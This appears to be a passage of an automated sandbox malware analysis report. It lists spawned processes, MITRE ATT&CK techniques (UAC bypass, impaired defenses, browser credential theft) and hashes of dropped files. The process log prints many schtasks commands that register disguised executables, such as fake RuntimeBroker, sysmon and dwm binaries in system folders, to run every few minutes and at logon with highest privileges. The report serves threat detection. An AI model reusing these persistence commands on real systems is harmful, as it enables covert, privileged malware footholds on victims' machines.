C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2904
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4196
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3236
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "BlockDriversessionB" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\BlockDriversession.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1044
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "BlockDriversession" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\BlockDriversession.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2060
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "BlockDriversessionB" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\BlockDriversession.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3404
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmons" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender\en-US\sysmon.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:976
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\en-US\sysmon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1428
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmons" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender\en-US\sysmon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1612
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\Windows\Help\en-US\dwm.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:216
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\Help\en-US\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4052
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\Windows\Help\en-US\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2716
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Videos\Idle.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3488
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Public\Videos\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4828
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Videos\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:64
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3780
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:692
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:2592
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
5Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.2MB
MD5434137b47c58cd2fe43ac11c4ca57d5e
SHA1f17ed590355e712ffb46fbcf6c336d631e32b9bc
SHA256ac77250c3cf3f478d8c264221dca59315f9a960891b868e4bb1f2e828d5999f0
SHA51276854bce72e876c96511dccfab1251afab814fb2befcfc2d3f3e101de675d66c9885cae884ab7af62f7c195f825558b52329b683cfc6f6311da7ff528dfa1bdc
-
Filesize
2.2MB
MD50a2d7f0801cf45923878c7d9adf0d93f
SHA18803bcf53ee79ed739fa533eb16ebe6e94213756
SHA256b95abda288cf2017789151be02cebef9ac5c3f65a2c9b944abb78cb2c11b2160
SHA512682b1fa705e08356ee3829cee220d57655e5fe08cb0e857ad5cefdcb158f360b0206ccae26003c978d8c34c5979d16e1571ffc0d50c4b3ae2f7b2ee2320297e1
-
Filesize
1KB
MD5dbe63509a4414a1b42de4e989eaa127a
SHA1f108870e9963812f7cf20f284157c10649236557
SHA2567457812f3d13a281c9035c5276a186d9ffee2d6d3ffa28fbb27aaa6f3524305a
SHA5125515396cf904c2d26377834d3f8770b69a814a1e065d4a4f88d10a76f98c0bbb6302bc1d04faa5cc49f39667707219164eea2c8e0d670f0f9e5a85f1f93f23c2
-
Filesize
700B
MD57f421413a3a37b7165efde5c994a54f0
SHA1c8d27a7bd60a62763eec31af7803104219330878
SHA2566bdef59ce5299cd28eb10dadc036161b8f4d0a11c384aeeb88a6b7ddee404a26
SHA512a603ec11a00ed1d9ccd58f6f414df7a6550a3f2fe3aaf953aac13cf1bf3a8983e2f1622fdf8fe50b957bc5e70ef83b6d5401b305c16ec1eb51314a8606aa3eda
-
Filesize
477B
MD57aedbf4c51e2d9287a7b8cc951bd82df
SHA152d3fe8bbc6a569941b87e0e1993926c25b87a8b
SHA256b0b76a49e2c6f1e4b38004bb432b88f62e956d138302ca0185951cf751ced776
SHA512966395869d1a4b78785c55271120969f5a2adbe493ba9fe12c35f69811964230f8721ec42f6deb981508e4424b6a630c3654dfcc7450c3556bac6a3a08d3a7e3
-
Filesize
701B
MD5b4ba1732d0b4e87036be70a698c800a3
SHA193f3ce12224bbe2860f92695bc1c73b7deb3f161
SHA2567f7fe3ff12387c088a9e176dbc018bb743f623e4436fd2334ef9032cbd35743d
SHA5129e8dd2c2bc0482d864183c72ad198de956e756e5514183810233ad227050817e61006ae97ae82032315791f15f080d37284ec40aff0d9ecb5c513a13dad92ccf
-
Filesize
190B
MD5b50d517895549466ce69c06aef1a4bda
SHA1668bfdae9b038da22825aa994ac8f3fbcbe1a361
SHA256139c9b42aa1f4df66fb4d7aeebcb558febc1d61953f7b34a1d04f57579f8f079
SHA5129e92c4c89206aebd63720f3d29b808e650c7d5357e8dd66ddf0a3f004135c70a5782fdedf5fce4e7684eeb1781f1d40d52430fb2b8a070cb68703c1e480f2bf1
-
Filesize
190B
MD584ff98f75b6d70e2f33e3b6ee2f807c7
SHA1ef9c61f4342ac6c5eb838513965c61577e3ebf09
SHA2568425367e13a42d3d172649299847377af94d64401d102e6bace63e4bf5830ac6
SHA5124397ac9830598d25779d25cb38256c9f528d1323947fe2f70f7ef33f608d2fb6448fbd37477d67fb0911178cbf2c4523028053f6f28db87450fb13317190a10b
-
Filesize
40KB
MD5a182561a527f929489bf4b8f74f65cd7
SHA18cd6866594759711ea1836e86a5b7ca64ee8911f
SHA25642aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA5129bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558
-
Filesize
190B
MD52ee029f89fe388b8f9af76112e5abcb9
SHA1c99baac7c654a852bc1d0801425755f86647d984
SHA256d6f49b77a7392080f0e5c1cf22095c35cf9f4d49631e7ce031bd028e25019902
SHA512b59d8b18294473e67160ea63ea2706e5690bd4deda18553b39c026159559ccdce60cfefbb09240634bdd0a8c4c64df071a76e92a1a109e4c5ffff99131f2eb25
-
Filesize
190B
MD5ff63ce24e7c1de05209c7ed7003f243a
SHA1ed47a21be8fcdf76f40f9f07e4797a1aafdad6e3
SHA256bde8074217573f4e467dabf68ae8b8a3b8156eb3aafab19c28e85dd33b1f8f22
SHA51207693687c162c3f7cdd77a6b7528f3784a00ba024da5d4f59c13e3be2b49ec25fcf7a9aee0b4f68f746ff0cd5471dc1fc9e2a5abbcb61b5431d3e1f7454f6ae0
-
Filesize
190B
MD54755150d128aa205408ac2f36c3f6493
SHA141fa8b516a3fc55681c4a945c549f4290ebcb637
SHA256eb9b28d211d13cabe713a71cff90c1be0fae977f3d399cd4e97ca8108bf4cead
SHA512ae965e44a0725dd459a7fbe9877881c1cfe098b63ce453a300da7f6b344a17ade20a814e80cbbbd814dd139ada1e64eb83234d5a7902415a0d31c5f4369631fb
-
Filesize
190B
MD51c0c4ea45725747ba2d15a78b95ef8c1
SHA1ba5c8bf2264964e378d4d3a8806bc5feef4aa1a2
SHA2569dc5e176810fa96ede65d1697a08eeed931677a94f6341abc5f7c7c869ec4d5a
SHA51221a77bb61723f385c6178f8d1e14b6b9cba0c5b2a6bbea180e3f51927d3836c72aeea7a044d3e9971554997882307665e91b8f8d993bcee9ad5c597f00007aea
-
Filesize
190B
MD59ffdb720efacf3af78a449400886e4fb
SHA1313709a32732ae58084371ac4ac3c3b4f69e9835
SHA2565bfc7c9afb977b6d681c822a228c83777092385b6d9356c6c09b338b915f68b6
SHA5122ed8e7e058a951317f30a42957fcaffcc1e097f901b05fc1a4ce091b81453355efd15407f555e387ec1418338e7e803bd506609b4d41901dfec23db904c698e2
-
Filesize
116KB
MD5f70aa3fa04f0536280f872ad17973c3d
SHA150a7b889329a92de1b272d0ecf5fce87395d3123
SHA2568d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA51230675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84
-
Filesize
114KB
MD52ba42ee03f1c6909ca8a6575bd08257a
SHA188b18450a4d9cc88e5f27c8d11c0323f475d1ae6
SHA256a14fb57193e6930fa9e410d9c55dfe98e3ae5e69b22356e621edc73683a581bd
SHA512a1f32c22f0d78cba95c04c432e2a58ea47fb34942e70bfdceffcc2ac1e91b87a3da2cd9f93793427ee09a623c7da700e1c16977d41a44286317e8fc20502f035
-
Filesize
190B
MD580ef4d52535ac7ba24669e9e97773ae3
SHA15583a366e90d636f61b136bbe0c8f0969d7558b2
SHA25657d0a97abaade2e4445b29baec8956327ec802f777fcb8046a89b22d4d9dc80b
SHA512e4440d12c86084ff043752e8a3949912dc3fcc0f1d7de78d7849e5440b952e4f33749f6634595c3e6ae0a5a2aec6e85b2fe5a5031669362ca798c3a2dbb4c3cb
-
Filesize
190B
MD5b0e0d35861d05db2b04a09234bde37c8
SHA19b2d6f399bf6b32e42866ff302c19104fdccc5b0
SHA25692cb7c32841532ed56d7c4e4b88db2a1ee0ac10aad3bda281f983c563266d20e
SHA5128b82f606fb6a934614193d7e5d63761e10822b3c51436f74a25f9742d50a95a17fe5d85d47b25423afb3882cb742b6035dabb3232989126c6828fc595c7a1e8e
-
Filesize
2.2MB
MD5d49b746e993d91bc41fdba6a27ca17bc
SHA1bc117ad939425c7c2ddb49024357b9c2fbbb53f5
SHA256d7f5f19740d24e6320d80820d3a3bbc2dc24f54711ac1c62ef2d971d9f2cc0ad
SHA512f4d75b2f5265449154bc0aea2c2a0eb4407f402da752a0486681433d0981bf4a3cc6e6102efe53010b6a033e9b5114643c2375369cacd0512a88be9f328d49fd
-
Filesize
2.2MB
MD54f18ea86161e94a4702bc197a9b28ee8
SHA1d71a1fdd09d177f6df67070fc2d9c9442f62bdf3
SHA256db0be9d56dbbd7947d9426408d4737eab35efb894f557444ed9256627f9d0439
SHA512fb726fd16cc5572ae373b14219dbff4d646109b2602af6158a11b522aa6a09b9ca3b1e83c016e25e77d01b39f364f96eae745bfdf341916cae1080568adfc071
-
Filesize
2.2MB
MD5f311f1b22f15adeb06c90a4007669c6f
SHA18e8374d2a7f47c64f7ba119f49c418709f8f14f5
SHA25614c9c44939d0f16e6d7c88902126290e23a12ad6889a81ead97e82bc4ec5cf3d
SHA512359383a159be1a1c9a564616cb71e234a7a42346233b03d4df2af6774f6dd713c5ab844fb3e7df99048d6a7b96990afc459d7a3d2026d3a62d86266677d5e093
-
Filesize
2.2MB
MD51c6457696f89995d1d3140df11bb13d8
SHA19ce32ce6cd29863252e71f1b0246a18879d72020
SHA256c16bc78cb749185c3a983fe9b739b3d47fd79265b0fc7c3c9527a2f0e9599294
SHA51271dd011a43a4c71d692505006831449390cd0a9febc1b0b215d141cacbc603b1b13945d356ae4a2c6ecec2fbd4e43d6d714cac3505fec94e453e6da814f670f5
-
Filesize
210B
MD5df0c2d3f2c34d6585dab72e7c7e68ee2
SHA139a9526dbbd2fb22ecb42dff06dc24b4b0f2101a
SHA2567f161d5bd44126e0933e733b46b0c4912db345667277506cc78d08a9464bb3e0
SHA5128bf10e01a9024173bfb06313932a151e601c97178b00e885e25509ea30bdc5f00017943d67095725f2d3dde608d4f6126ac52166639831f17d3ee3ae391e64a3
-
Filesize
151B
MD59057cf6aa3be25586ce999472ed54810
SHA16f608a8f42892b7bb5383cbe5a3f0c6d7b66e45f
SHA256f795fe0dcca481ca1f45663140832c1e3bf8c6d37f33712c67ae5d5dc90482ae
SHA5127829c023b2dfce5751703ca26d1510d045e7c29ebe8ed086e65151eb22d0306316b26acda3a5d50568c42f94c8b42a762525adbaae4f4f39f6ceba05ec82f0f6
-
Filesize
2.2MB
MD5f37fb0a09c0e0805c252a01e90919328
SHA1bb1268dc15a4923e5602390a7858cba9b1457367
SHA2564053601c096a144af686facf800e9c6a6d2f51c07edd64c4f945efd9f15ea91c
SHA512be2c6dbaa5b07ee5172b73f5fac325e65b13c1db94e4306c4f81e35f4a777d4eccbdc6ee479d22ba928cb7ac6148fb2a30b8313a72c0f97a292a3a46765c6aa7